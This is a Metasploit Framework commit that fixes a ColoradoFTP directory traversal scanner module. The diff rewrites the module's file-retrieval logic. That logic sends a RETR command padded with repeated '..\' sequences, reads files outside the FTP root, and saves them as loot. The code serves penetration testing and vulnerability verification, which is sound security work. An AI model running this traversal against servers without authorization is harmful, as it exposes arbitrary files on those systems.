Land #8632, colorado ftp fixes

2018-01-23 17:45:07 -06:00 · 2018-01-23 17:45:07 -06:00 · eb572a3ef5
parent a27cfeaea9 7175468ff7
commit eb572a3ef5
2 changed files with 25 additions and 44 deletions
--- a/documentation/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.md
+++ b/documentation/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.md
@ -6,7 +6,7 @@ While the application is based in java, I was only able to get it to exploit aga

  [official site](http://cftp.coldcore.com/files/coloradoftp-prime-8.zip?site=cft1&rv=19.1&nc=1) or [github backup](https://github.com/h00die/MSF-Testing-Scripts/raw/master/coloradoftp-prime-8.zip)
  
-When installing, you must edit conf/beans.xml line 182 "localIp" to put in your IP or else `pasv` won't work.
+When installing, you must edit conf/beans.xml line 183 "remoteIp" to put in your IP or else `pasv` won't work.

 ## Verification Steps

--- a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary
      'References'     =>
        [
          [ 'EDB', '40231'],
-          [ 'URL', 'https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86']
+          [ 'URL', 'https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86'],
+          [ 'URL', 'http://www.securityfocus.com/archive/1/539186']
        ],
      'DisclosureDate' => 'Aug 11 2016'
    ))
@ -47,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
    begin
      connect
      if /Welcome to ColoradoFTP - the open source FTP server \(www\.coldcore\.com\)/i === banner
-        return Exploit::CheckCode::Appears
+        return Exploit::CheckCode::Detected
      end
    ensure
      disconnect
@ -59,51 +60,31 @@ class MetasploitModule < Msf::Auxiliary
  def run_host(ip)
    begin
      connect_login
-      sock = data_connect
+      file_path = datastore['PATH']
+      file = ::File.basename(file_path)

-      # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
-      # and  #7582
-      if sock.nil?
-        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
-        print_status(error_msg)
-        elog(error_msg)
+      # make RETR request and store server response message...
+      retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
+      res = send_cmd_data( ['get', retr_cmd], '')
+      unless res.nil?
+        print_status(res[0])
+        response_data = res[1]
      else
-        file_path = datastore['PATH']
-        file = ::File.basename(file_path)
-
-        # make RETR request and store server response message...
-        retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
-        res = send_cmd( ["retr", retr_cmd], true)
-        print_status(res)
-
-        # dont assume theres still a sock to read from. Per #7582
-        if sock.nil?
-          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
-          print_status(error_msg)
-          elog(error_msg)
-          return
-        else
-          # read the file data from the socket that we opened
-          response_data = sock.read(1024)
-        end
-
-        unless response_data
-          print_error("#{file} not found")
-          return
-        end
-
-        if response_data.length == 0
-          print_status("File (#{file_path})from #{peer} is empty...")
-          return
-        end
-
-        # store file data to loot
-        loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
-        vprint_status("Data returned:\n")
-        vprint_line(response_data)
-        print_good("Stored #{file_path} to #{loot_file}")
+        print_error("#{file} not found or invalid login")
+        return
      end

+      if response_data.length == 0
+        print_status("File (#{file_path})from #{peer} is empty...")
+        return
+      end
+
+      # store file data to loot
+      loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
+      vprint_status("Data returned:\n")
+      vprint_line(response_data)
+      print_good("Stored #{file_path} to #{loot_file}")
+
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
      vprint_error(e.message)
      elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")